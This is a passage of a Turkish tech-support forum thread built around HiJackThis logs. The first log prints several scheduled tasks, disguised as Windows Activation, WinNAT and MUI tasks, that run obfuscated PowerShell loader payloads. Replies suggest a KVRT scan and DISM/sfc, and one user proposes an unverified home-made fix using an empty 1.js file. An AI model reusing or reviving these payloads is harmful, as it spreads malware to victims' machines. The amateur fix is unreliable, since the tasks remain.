O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='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';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''pkCb3R0bXRFJocmbxZHbpJXc2xGdTRXZxZHbH5COGFndsRVV6oTXn5WaxZHbk92YxZHbuVkL0hXc2xWZU5SblRXc2x2c5FndsN1WogXc2xWZxZHbptTKyVmYxZHbtVnbsFndsFWayV2Uuclb1ZXRi9GJrcCInsCblRWc2x2bN5yVuVndFJ2bkgCIpkybDJUdLZHJocmbpJHdxZHbTRTc2xmNlNXYxZHbC12bxZHbyZkO60FdyVmdxZHbu92Qu0WZ0FndsNXeTtFKgMWc2xWZk1Db3R0bXRFJ7IXZi1Wc2xWduxWYpFndsJXZTxCblFndsR2bNBCdjVWc2xGblNHf9dCMFZVSSRETBFndsNUSTlFSQxlLcx1JgEXZtACRJVWc2x2YpZXZE5yXksHIlJXc2xWZodHflZXaxZHbyR2axZHbzlGZfJzMxZHbulWc2x2dgkWbxZHb3dWPX5Wd2VkYvRSf7kERLZ0QkAibyFndsVHdlJXfrsyVuVndFRyOORXbmRCIy9Gei1CIddlb1ZXRksVdFBlVkAicvFndshnYtASX1hFRVJFUksVSEtkRDRSPdVHWEVlUQRyWJR0SGNEJ74EdtZGJgI3bxZHb4JWLgkiM1EDIy9mYtAiT01mZkACZuFndsFmYtAyMygSPORXbmRSfw0zVuVndFRyepQnb192QuUXRQZFJgU2ZtAyVuVndFRCKml2epsyK1hFRVJFUksDduV3bD5SSEtkRDRCI0xWLgUHWEVlUQRyOw0TdYRUVSBFJoI3bxZHbmtDM9clb1ZXRksTXwsVdFBlVk0jT01mZksTKSlVWX5kekgyclFndsRXeCRXc2xWZH5COGRVV6oTXn5Wc2xWak92YuVkL0FndshXZU5SblFndsR3c5N1W9UXRQZFJ7liUZl1VOpHJddmbpJXc2xGdztFLJR0SGNEJd11WlRXc2xWeitFKjVWc2xGZg42bpR3YxZHbuVnZ'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb([email protected]_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var -rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)


Rehberdeki yönergeleri takip ederek "KVRT" ile sisteme tam tarama yapın.



Aşağıdaki komutları yönetici CMD'sinde sırayla çalıştırın:

Dism.exe /online /Cleanup-Image /checkhealth
Dism.exe /online /Cleanup-Image /scanhealth
Dism.exe /online /Cleanup-Image /Restorehealth
sfc /scannow
 

white angel

Zeptopat
Katılım
29 Ocak 2022
Mesajlar
4
ben çözümünü buldum

masaüstünde bir not defteri (yeni metin belgesi) açıp, içine hiçbir şey yazmadan, sol üstteki dosya kısmından farklı kaydete basıyosunuz, dosya adı kısmına 1.js yazıyorsunuz. masaüstüne sarı renkli üzerinde büyük S harfi gibi yazan bi dosya geliyor. dosyanın adı da 1 olarak gözüküyor.

Bu dosyayı;

C:\ProgramData\Windows\profile bunu arattıktan sonra çıkan pencereye masaüstündeki 1.js dosyasını bunun içine atıyosunuz

C:\ProgramData\Windows\profile bunu manuel olarak bulamazsanız,
kopyalayıp bilgisayarın el alt sol tarafındaki windows tuşunun yanındaki büyüteç arama tuşuna yapıştırırsan çıkar

geçmiş olsun herkese
 

Dosya Ekleri

  • 1.js resim.jpg
    1.js resim.jpg
    9,6 KB · Görüntüleme: 29
Artı -2 Eksi

True7Emperor

Femtopat
Katılım
18 Nisan 2022
Mesajlar
1
Whitelist'e eklediklerinizi çıkarıp aşağıdaki raporu paylaşın.

Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.17

Platform: x64 Windows 11 (Home), 10.0.22000.588 (ReleaseId: 2009, 21H2), Service Pack: 0
Time: 18.04.2022 - 20:54 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: acer (group: Administrators) on LAPTOP-M2LIPIMO, FirstRun: no

Chrome: 100.0.4896.88
Firefox: 85.0.2.7709
Internet Explorer: 11.0.22000.120
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal

Kod:
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.17

Platform:  x64 Windows 11 (Home), 10.0.22000.588 (ReleaseId: 2009, 21H2), Service Pack: 0
Time:      18.04.2022 - 20:54 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated:  Yes
Ran by:    acer    (group: Administrators) on LAPTOP-M2LIPIMO, FirstRun: no

Chrome:  100.0.4896.88
Firefox: 85.0.2.7709
Internet Explorer: 11.0.22000.120
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
   1  C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
  28  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
   6  C:\Program Files (x86)\Microsoft\EdgeWebView\Application\100.0.1185.44\msedgewebview2.exe
   1  C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe
   1  C:\Program Files\Acer\Quick Access Service\QAAdminAgent.exe
   1  C:\Program Files\Acer\Quick Access Service\QAAgent.exe
   1  C:\Program Files\Acer\Quick Access Service\QASvc.exe
   1  C:\Program Files\Acer\StorPSCTL\StorPSCTL.exe
   1  C:\Program Files\Acer\User Experience Improvement Program Service\Framework\UBTService.exe
   1  C:\Program Files\Acer\User Experience Improvement Program Service\Plugin\AppMonitor\AppMonitorPlugIn.exe
   1  C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
   3  C:\Program Files\Common Files\McAfee\ChromiumContainer\delegate.exe
   1  C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\McCSPServiceHost.exe
   1  C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
   3  C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
   1  C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
   1  C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
   1  C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
   1  C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
   1  C:\Program Files\Common Files\McAfee\VSCore_22_2\mcapexe.exe
   1  C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
   1  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
  18  C:\Program Files\Google\Chrome\Application\chrome.exe
   1  C:\Program Files\McAfee.com\Agent\mcupdate.exe
   1  C:\Program Files\McAfee\CoreUI\Launch.exe
   1  C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
   1  C:\Program Files\McAfee\MQS\QcShm.exe
   1  C:\Program Files\McAfee\MSC\MfeBrowserHost.exe
   1  C:\Program Files\McAfee\VUL\McV50AF.tmp
   1  C:\Program Files\McAfee\WebAdvisor\browserhost.exe
   1  C:\Program Files\McAfee\WebAdvisor\servicehost.exe
   1  C:\Program Files\McAfee\WebAdvisor\uihost.exe
   1  C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.63.31001.0_x64__8wekyb3d8bbwe\gamingservices.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.63.31001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.22032.174.0_x64__8wekyb3d8bbwe\YourPhone.exe
   1  C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_421.20070.95.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe
   1  C:\Users\acer\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe
   1  C:\Users\acer\OneDrive\Masaüstü\HiJackThis\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\System32\AggregatorHost.exe
   1  C:\Windows\System32\ApplicationFrameHost.exe
   1  C:\Windows\System32\audiodg.exe
   2  C:\Windows\System32\cmd.exe
   4  C:\Windows\System32\conhost.exe
